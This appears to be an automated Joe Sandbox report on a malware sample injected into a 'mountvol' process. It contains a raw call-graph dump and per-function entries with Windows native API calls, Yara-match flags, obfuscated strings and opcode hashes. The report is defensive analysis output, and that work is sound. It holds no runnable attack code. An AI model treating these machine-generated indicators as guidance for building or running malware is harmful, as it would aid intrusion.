100593->100588 100595 2a45922 100594->100595 100597 2a4592f 100595->100597 100609 2a31c00 100595->100609 100597->100589 100599 2a3346d 100598->100599 100601 2a33486 100599->100601 100602 2a4a1d0 100599->100602 100601->100593 100603 2a4a1ea 100602->100603 100604 2a4a219 100603->100604 100605 2a48dc0 LdrInitializeThunk 100603->100605 100604->100601 100606 2a4a279 100605->100606 100607 2a4b850 RtlFreeHeap 100606->100607 100608 2a4a292 100607->100608 100608->100601 100610 2a31c3b 100609->100610 100625 2a380f0 100610->100625 100612 2a31c43 100613 2a4b930 RtlAllocateHeap 100612->100613 100624 2a31f20 100612->100624 100614 2a31c59 100613->100614 100615 2a4b930 RtlAllocateHeap 100614->100615 100616 2a31c6a 100615->100616 100617 2a4b930 RtlAllocateHeap 100616->100617 100619 2a31c77 100617->100619 100620 2a31d17 100619->100620 100640 2a36c80 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100619->100640 100621 2a347a0 LdrLoadDll 100620->100621 100622 2a31ed2 100621->100622 100636 2a48200 100622->100636 100624->100597 100626 2a3811c 100625->100626 100627 2a37fe0 2 API calls 100626->100627 100628 2a3813f 100627->100628 100629 2a38161 100628->100629 100630 2a38149 100628->100630 100633 2a49770 NtClose 100629->100633 100634 2a3817d 100629->100634 100631 2a38154 100630->100631 100632 2a49770 NtClose 100630->100632 100631->100612 100632->100631 100635 2a38173 100633->100635 100634->100612 100635->100612 100637 2a48262 100636->100637 100639 2a4826f 100637->100639 100641 2a31f30 100637->100641 100639->100624 100640->100620 100657 2a383c0 100641->100657 100643 2a324b6 100643->100639 100644 2a31f50 100644->100643 100661 2a413f0 100644->100661 100647 2a3216a 100649 2a4ca20 2 API calls 100647->100649 100648 2a31fae 100648->100643 100664 2a4c8f0 100648->100664 100651 2a3217f 100649->100651 100650 2a38360 LdrInitializeThunk 100654 2a321d2 100650->100654 100651->100654 100669 2a30a30 100651->100669 100653 2a32329 100653->100654 100655 2a38360 LdrInitializeThunk 100653->100655 100654->100643 100654->100650 100656 2a30a30 LdrInitializeThunk 100654->100656 100655->100653 100656->100654 100658 2a383cd 100657->100658 100659 2a383f5 100658->100659 100660 2a383ee SetErrorMode 100658->100660 100659->100644 100660->100659 100662 2a4b7c0 NtAllocateVirtualMemory 100661->100662 100663 2a41411 100662->100663 100663->100648 100665 2a4c906 100664->100665 100666 2a4c900 100664->100666 100667 2a4b930 RtlAllocateHeap 100665->100667 100666->100647 100668 2a4c92c 100667->100668 100668->100647 100672 2a499f0 100669->100672 100673 2a49a0a 100672->100673 100676 3122c70 LdrInitializeThunk 100673->100676 100674 2a30a52 100674->100653 100676->100674 100677 2a3afc0 100682 2a3acd0 100677->100682 100679 2a3afcd 100696 2a3a940 100679->100696 100681 2a3afe3 100683 2a3acf5 100682->100683 100707 2a385d0 100683->100707 100686 2a3ae40 100686->100679 100688 2a3ae57 100688->100679 100689 2a3ae4e 100689->100688 100691 2a3af45 100689->100691 100726 2a3a390 100689->100726 100693 2a3afaa 100691->100693 100735 2a3a700 100691->100735 100694 2a4b850 RtlFreeHeap 100693->100694 100695 2a3afb1 100694->100695 100695->100679 100697 2a3a956 100696->100697 100704 2a3a961 100696->100704 100698 2a4b930 RtlAllocateHeap 100697->100698 100698->100704 100699 2a3a988 100699->100681 100700 2a385d0 GetFileAttributesW 100700->100704 100701 2a3aca2 100702 2a3acbb 100701->100702 100703 2a4b850 RtlFreeHeap 100701->100703 100702->100681 100703->100702 100704->100699 100704->100700 100704->100701 100705 2a3a390 RtlFreeHeap 100704->100705 100706 2a3a700 RtlFreeHeap 100704->100706 100705->100704 100706->100704 100708 2a385f1 100707->100708 100709 2a385f8 GetFileAttributesW 100708->100709 100710 2a38603 100708->100710 100709->100710 100710->100686 100711 2a43610 100710->100711 100712 2a4361e 100711->100712 100713 2a43625 100711->100713 100712->100689 100714 2a347a0 LdrLoadDll 100713->100714 100715 2a4365a 100714->100715 100716 2a43669 100715->100716 100739 2a430d0 LdrLoadDll 100715->100739 100718 2a4b930 RtlAllocateHeap 100716->100718 100722 2a43814 100716->100722 100719 2a43682 100718->100719 100720 2a4380a 100719->100720 100719->100722 100723 2a4369e 100719->100723 100721 2a4b850 RtlFreeHeap 100720->100721 100720->100722 100721->100722 100722->100689 100723->100722 100724 2a4b850 RtlFreeHeap 100723->100724 100725 2a437fe 100724->100725 100725->100689 100727 2a3a3b6 100726->100727 100740 2a3dde0 100727->100740 100729 2a3a428 100731 2a3a5b0 100729->100731 100732 2a3a446 100729->100732 100730 2a3a595 100730->100689 100731->100730 100733 2a3a250 RtlFreeHeap 100731->100733 100732->100730 100745 2a3a250 100732->100745 100733->100731 100736 2a3a726 100735->100736 100737 2a3dde0 RtlFreeHeap 100736->100737 100738 2a3a7ad 100737->100738 100738->100691 100739->100716 100741 2a3de04 100740->100741 100742 2a3de11 100741->100742 100743 2a4b850 RtlFreeHeap 100741->100743 100742->100729 100744 2a3de54 100743->100744 100744->100729 100746 2a3a26d 100745->100746 100749 2a3de70 100746->100749 100748 2a3a373 100748->100732 100750 2a3de94 100749->100750 100751 2a3df3e 100750->100751 100752 2a4b850 RtlFreeHeap 100750->100752 100751->100748 100752->100751 100758 2a41dc0 100759 2a41dd9 100758->100759 100760 2a41e24 100759->100760 100763 2a41e64 100759->100763 100765 2a41e69 100759->100765 100761 2a4b850 RtlFreeHeap 100760->100761 100762 2a41e34 100761->100762 100764 2a4b850 RtlFreeHeap 100763->100764 100764->100765 100768 2a3fad0 100769 2a3fb34 100768->100769 100797 2a36520 100769->100797 100771 2a3fc6e 100772 2a3fc67 100772->100771 100804 2a36630 100772->100804 100774 2a3fe13 100775 2a3fcea 100775->100774 100776 2a3fe22 100775->100776 100808 2a3f8b0 100775->100808 100777 2a49770 NtClose 100776->100777 100779 2a3fe2c 100777->100779 100780 2a3fd26 100780->100776 100781 2a3fd31 100780->100781 100782 2a4b930 RtlAllocateHeap 100781->100782 100783 2a3fd5a 100782->100783 100784 2a3fd63 100783->100784 100785 2a3fd79 100783->100785 100786 2a49770 NtClose 100784->100786 100817 2a3f7a0 CoInitialize 100785->100817 100788 2a3fd6d 100786->100788 100791 2a3fe02 100792 2a49770 NtClose 100791->100792 100793 2a3fe0c 100792->100793 100794 2a4b850 RtlFreeHeap 100793->100794 100794->100774 100795 2a3fda5 100795->100791 100796 2a49230 LdrInitializeThunk 100795->100796 100796->100795 100798 2a36553 100797->100798 100799 2a36577 100798->100799 100825 2a492d0 100798->100825 100799->100772 100801 2a3659a 100801->100799 100802 2a49770 NtClose 100801->100802 100803 2a3661c 100802->100803 100803->100772 100805 2a36655 100804->100805 100830 2a490e0 100805->100830 100809 2a3f8cc 100808->100809 100810 2a347a0 LdrLoadDll 100809->100810 100812 2a3f8ea 100810->100812 100811 2a3f8f3 100811->100780 100812->100811 100813 2a347a0 LdrLoadDll 100812->100813 100814 2a3f9be 100813->100814 100815 2a347a0 LdrLoadDll 100814->100815 100816 2a3fa18 100814->100816 100815->100816 100816->100780 100820 2a3f805 100817->100820 100818 2a3f89b CoUninitialize 100819 2a3f8a1 100818->100819 100821 2a49230 100819->100821 100820->100818 100822 2a4924a 100821->100822 100835 3122ba0 LdrInitializeThunk 100822->100835 100823 2a4927a 100823->100795 100826 2a492ed 100825->100826 100829 3122ca0 LdrInitializeThunk 100826->100829 100827 2a49319 100827->100801 100829->100827 100831 2a490fd 100830->100831 100834 3122c60 LdrInitializeThunk 100831->100834 100832 2a366c9 100832->100775 100834->100832 100835->100823 100836 2a324d0 100837 2a324dd 100836->100837 100838 2a48dc0 LdrInitializeThunk 100837->100838 100839 2a32506 100838->100839 100842 2a49800 100839->100842 100841 2a3251b 100843 2a4988f 100842->100843 100844 2a4982b 100842->100844 100847 3122e80 LdrInitializeThunk 100843->100847 100844->100841 100845 2a498c0 100845->100841 100847->100845 100848 2a35e10 100849 2a38360 LdrInitializeThunk 100848->100849 100850 2a35e40 100849->100850 100852 2a35e8a 100850->100852 100853 2a35e6c 100850->100853 100854 2a382e0 100850->100854 100855 2a38324 100854->100855 100860 2a38345 100855->100860 100861 2a48a90 100855->100861 100857 2a38335 100858 2a38351 100857->100858 100859 2a49770 NtClose 100857->100859 100858->100850 100859->100860 100860->100850 100862 2a48b0d 100861->100862 100864 2a48abb 100861->100864 100866 3124650 LdrInitializeThunk 100862->100866 100863 2a48b32 100863->100857 100864->100857 100866->100863 100867 2a38a50 100868 2a38a03 100867->100868 100869 2a38a55 100867->100869 100869->100868 100871 2a37310 100869->100871 100872 2a37326 100871->100872 100874 2a3735f 100871->100874 100872->100874 100875 2a37180 LdrLoadDll 100872->100875 100874->100868 100875->100874 100876 2a37390 100877 2a373ac 100876->100877 100880 2a373ff 100876->100880 100879 2a49770 NtClose 100877->100879 100877->100880 100878 2a37537 100881 2a373c7 100879->100881 100880->100878 100887 2a367b0 NtClose LdrInitializeThunk LdrInitializeThunk 100880->100887 100886 2a367b0 NtClose LdrInitializeThunk LdrInitializeThunk 100881->100886 100883 2a37511 100883->100878 100888 2a36980 NtClose LdrInitializeThunk LdrInitializeThunk 100883->100888 100886->100880 100887->100883 100888->100878 100894 2a496d0 100895 2a49747 100894->100895 100897 2a496fb 100894->100897 100896 2a4975d NtDeleteFile 100895->100896 100903 2a403d0 100904 2a403f3 100903->100904 100905 2a347a0 LdrLoadDll 100904->100905 100906 2a40417 100905->100906 100907 2a39e9b 100909 2a39ea1 100907->100909 100908 2a39ecd 100909->100908 100910 2a4b850 RtlFreeHeap 100909->100910 100910->100908 100911 2a3299a 100912 2a36520 2 API calls 100911->100912 100913 2a329d3 100912->100913

                                                                                        Executed Functions

                                                                                        Function 02A29F00 Relevance: 26.6, Strings: 21, Instructions: 379COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 27 2a29f00-2a2a220 28 2a2a222-2a2a22b 27->28 29 2a2a231-2a2a23d 27->29 28->29 30 2a2a24e-2a2a258 29->30 31 2a2a23f-2a2a24c 29->31 32 2a2a269-2a2a272 30->32 31->28 33 2a2a274-2a2a286 32->33 34 2a2a288-2a2a299 32->34 33->32 35 2a2a2aa-2a2a2b6 34->35 37 2a2a2b8-2a2a2cb 35->37 38 2a2a2cd-2a2a2d4 35->38 37->35 39 2a2a2db-2a2a2e4 38->39 41 2a2a300-2a2a309 39->41 42 2a2a2e6-2a2a2fe 39->42 43 2a2a4d8-2a2a4e4 41->43 44 2a2a30f-2a2a319 41->44 42->39 45 2a2a4e6-2a2a507 43->45 46 2a2a509-2a2a513 43->46 47 2a2a32a-2a2a336 44->47 45->43 48 2a2a524-2a2a530 46->48 49 2a2a338-2a2a34a 47->49 50 2a2a34c-2a2a358 47->50 51 2a2a532-2a2a545 48->51 52 2a2a547-2a2a54e 48->52 49->47 53 2a2a35a-2a2a37b 50->53 54 2a2a37d-2a2a390 50->54 51->48 57 2a2a554-2a2a564 52->57 58 2a2a61b-2a2a625 52->58 53->50 59 2a2a3a1-2a2a3ad 54->59 57->57 60 2a2a566 call 2a4b4b0 57->60 61 2a2a627-2a2a641 58->61 62 2a2a65c-2a2a663 58->62 63 2a2a3c4-2a2a3d3 59->63 64 2a2a3af-2a2a3c2 59->64 74 2a2a56b-2a2a57b 60->74 66 2a2a643-2a2a647 61->66 67 2a2a648-2a2a64a 61->67 68 2a2a66e-2a2a675 62->68 69 2a2a417-2a2a421 63->69 70 2a2a3d5-2a2a3df 63->70 64->59 66->67 75 2a2a65a 67->75 76 2a2a64c-2a2a654 67->76 77 2a2a677-2a2a6bb 68->77 78 2a2a6bd-2a2a6c7 68->78 73 2a2a432-2a2a43e 69->73 72 2a2a3f0-2a2a3fc 70->72 81 2a2a412 72->81 82 2a2a3fe-2a2a410 72->82 83 2a2a440-2a2a44f 73->83 84 2a2a451-2a2a45b 73->84 74->74 85 2a2a57d-2a2a587 74->85 75->58 76->75 77->68 79 2a2a6d8-2a2a6e1 78->79 86 2a2a6e3-2a2a6f6 79->86 87 2a2a6f8-2a2a702 79->87 81->43 82->72 83->73 89 2a2a46c-2a2a478 84->89 91 2a2a598-2a2a5a4 85->91 86->79 93 2a2a47a-2a2a489 89->93 94 2a2a48b-2a2a492 89->94 95 2a2a5b1-2a2a5b8 91->95 96 2a2a5a6-2a2a5af 91->96 93->89 97 2a2a494-2a2a4c7 94->97 98 2a2a4c9-2a2a4d3 94->98 100 2a2a5f6-2a2a5ff 95->100 101 2a2a5ba-2a2a5c6 95->101 96->91 97->94 98->41 100->58 105 2a2a601-2a2a619 100->105 103 2a2a5c8-2a2a5cc 101->103 104 2a2a5cd-2a2a5cf 101->104 103->104 106 2a2a5e0-2a2a5f4 104->106 107 2a2a5d1-2a2a5da 104->107 105->100 106->95 107->106
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: &o$+$0b$3)$;$=$Cj$F$Qh$Ul$_U$f}$g*$m4$n6$q0$}l$*$2$L$}
                                                                                        • API String ID: 0-4041391445
                                                                                        • Opcode ID: 2ebeae2df7bb68d54bfc22f77f8e34397705c6db3894e8458308717ca3fd99d4
                                                                                        • Instruction ID: 31bd8f097c40ab8994ababea890621aa8865abc231f23cad22087e0d1fe010a4
                                                                                        • Opcode Fuzzy Hash: 2ebeae2df7bb68d54bfc22f77f8e34397705c6db3894e8458308717ca3fd99d4
                                                                                        • Instruction Fuzzy Hash: BC228EB0D05629CBEB24CF98C998BEDBBB1BB45308F1081DAC50D7B281DB755A89CF54
                                                                                        Function 02A3C870 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 02A3C954
                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 02A3C98F
                                                                                        • FindClose.KERNELBASE(?), ref: 02A3C99A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 3541575487-0
                                                                                        • Opcode ID: cd44eac4657e2d8e493b86929044e15a3fd1de6e927289ff7c93b2b05651424b
                                                                                        • Instruction ID: 6c1bd21047c58359947e8515c53e3d9215446573d0ee3da45a30f78f9cd8e6f4
                                                                                        • Opcode Fuzzy Hash: cd44eac4657e2d8e493b86929044e15a3fd1de6e927289ff7c93b2b05651424b
                                                                                        • Instruction Fuzzy Hash: F1319271A40308ABDB21DF64CDC5FEE777E9F84758F104459B908A7180DF70AA84CBA0
                                                                                        Function 02A49470 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,618D4921,?,?,?,?,?), ref: 02A4956B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 24933e51439b23e441a6cdccec528dd219e56052841bdb2fa39ade5dcfd21af0
                                                                                        • Instruction ID: ba2290d6e82dd54a475c5c60516a1c6ae451937d2206eaafcb42ed2bca00e1ef
                                                                                        • Opcode Fuzzy Hash: 24933e51439b23e441a6cdccec528dd219e56052841bdb2fa39ade5dcfd21af0
                                                                                        • Instruction Fuzzy Hash: 0231C5B5A40648AFDB14DF98D881EDEB7F9EF8C304F108219F918A7240D730A851CFA4
                                                                                        Function 02A495E0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtReadFile.NTDLL(?,?,?,?,?,618D4921,?,?,?), ref: 02A496C3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 6f4ad4b8d1f7fce5ade859750167c4e05e4523ef5d0e33518a5a1ea74dc2fd05
                                                                                        • Instruction ID: 82de895d49f7cf7d60d244e40490a9345dea86fb9c3a945e0892328b6d3c7dad
                                                                                        • Opcode Fuzzy Hash: 6f4ad4b8d1f7fce5ade859750167c4e05e4523ef5d0e33518a5a1ea74dc2fd05
                                                                                        • Instruction Fuzzy Hash: CD31D8B5A40648AFDB14DF98D881EEEB7B9EF88314F108219F918A7240D730A811CFA4
                                                                                        Function 02A498D0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(02A31FAE,?,02A4826F,00000000,00000004,618D4921,?,?,?,?,?,02A4826F,02A31FAE), ref: 02A49998
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        • Opcode ID: 84dbb807530236959b87924d06af7e0aeba798c94e816ebfd7ca1c8bd176efdd
                                                                                        • Instruction ID: 6a017583b82981294fbb3022c3ac5f7c49ac5ac86aa35b1171c9c27b34ebab37
                                                                                        • Opcode Fuzzy Hash: 84dbb807530236959b87924d06af7e0aeba798c94e816ebfd7ca1c8bd176efdd
                                                                                        • Instruction Fuzzy Hash: 07210AB5A40249ABDB10DF98DC81EEFB7B9EF88310F108519F958A7241DB70A911CBA1
                                                                                        Function 02A496D0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DeleteFile
                                                                                        • String ID:
                                                                                        • API String ID: 4033686569-0
                                                                                        • Opcode ID: 05130372a0391a98de97a1749ee98865b0860d6e5e7f8ed223d2358e5c93c039
                                                                                        • Instruction ID: adf23e513ba576efb06681a08b8627d274a5d9d702ee6dfe1db79276c3078628
                                                                                        • Opcode Fuzzy Hash: 05130372a0391a98de97a1749ee98865b0860d6e5e7f8ed223d2358e5c93c039
                                                                                        • Instruction Fuzzy Hash: 6411A371580708BAD610EB68CC81FEBB7ADDFC9314F008559F90C67241DB71B515CBA1
                                                                                        Function 02A49770 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02A497A4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 3a648ce88628a05c2ddc7387a078bf85c9b2b0d74a8cd61bb1559c6bf325344b
                                                                                        • Instruction ID: 3294b6c41155e233d2174b92d7193714c33cd5c1793843f80e100efdc6a8e6e6
                                                                                        • Opcode Fuzzy Hash: 3a648ce88628a05c2ddc7387a078bf85c9b2b0d74a8cd61bb1559c6bf325344b
                                                                                        • Instruction Fuzzy Hash: FFE08C36244614BBD220EB6ACC41F9B77ADEFC5728F008419FA0DA7242CB71B9118BF0
                                                                                        Function 03124340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 41f14275d891e899ccc3a34c8a79903f51f5d97daa86327873f0e276c8f32b0f
                                                                                        • Instruction ID: 67fbabd9a2014e55a077338390fbe21c7339522b6d9a67dd74739d4b5de308eb
                                                                                        • Opcode Fuzzy Hash: 41f14275d891e899ccc3a34c8a79903f51f5d97daa86327873f0e276c8f32b0f
                                                                                        • Instruction Fuzzy Hash: DC900231605804139540B2584984546501597E5301B55D011F0429554C8B148A5A6361
                                                                                        Function 03124650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 538d17563b176872975bf941407dae588868c4d78b3edd0b63af9f34f78e0012
                                                                                        • Instruction ID: f2f5a701dbb432f583a339ff0542be74fab39d7837208e2394eef21e1482cc8c
                                                                                        • Opcode Fuzzy Hash: 538d17563b176872975bf941407dae588868c4d78b3edd0b63af9f34f78e0012
                                                                                        • Instruction Fuzzy Hash: D3900261601504434540B2584904406701597E6301395D115B0559560C87188959A269
                                                                                        Function 03122B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: e5e697a7f64f8950e82dc3d1cf79ed788b9eaea65be3591cc64ff8843c4e955d
                                                                                        • Instruction ID: ffd7b6b456879e820e6180cd9f4566dfcfe618c98d02028741f24500f360680c
                                                                                        • Opcode Fuzzy Hash: e5e697a7f64f8950e82dc3d1cf79ed788b9eaea65be3591cc64ff8843c4e955d
                                                                                        • Instruction Fuzzy Hash: A3900261202404034505B2584514616501A87E5201B55D021F1019590DC72589957125
                                                                                        Function 03122BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 0ae70537d80c471ec9b41dc9438afc9bb16c7c309e952b2b503d802257aacd14
                                                                                        • Instruction ID: 940ecfc352d706d1e2d44d33e2b907c3706106177a4cd19237f220ff59d52ab4
                                                                                        • Opcode Fuzzy Hash: 0ae70537d80c471ec9b41dc9438afc9bb16c7c309e952b2b503d802257aacd14
                                                                                        • Instruction Fuzzy Hash: 6C90023160540C03D550B2584514746101587D5301F55D011B0029654D87558B5976A1
                                                                                        Function 03122BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: ede7c6423e283856692b907ef8db7ea62c6bf0d6f33189339d099880cfb9021d
                                                                                        • Instruction ID: 0838ea15cedcde8ace62bffb270081d892f525e7163447e8d8d955b06f98e84e
                                                                                        • Opcode Fuzzy Hash: ede7c6423e283856692b907ef8db7ea62c6bf0d6f33189339d099880cfb9021d
                                                                                        • Instruction Fuzzy Hash: 8890023120140C03D580B258450464A101587D6301F95D015B002A654DCB158B5D77A1
                                                                                        Function 03122BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 058e4115251dac602f16778c43d355500b9c8a54107476a2782f390e3388e7c4
                                                                                        • Instruction ID: 9ec314e3a738eec5749c332c8b9e6f21bd9872214ade234f4ab45b9f2cee5cd9
                                                                                        • Opcode Fuzzy Hash: 058e4115251dac602f16778c43d355500b9c8a54107476a2782f390e3388e7c4
                                                                                        • Instruction Fuzzy Hash: A590023120544C43D540B2584504A46102587D5305F55D011B0069694D97258E59B661
                                                                                        Function 03122AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
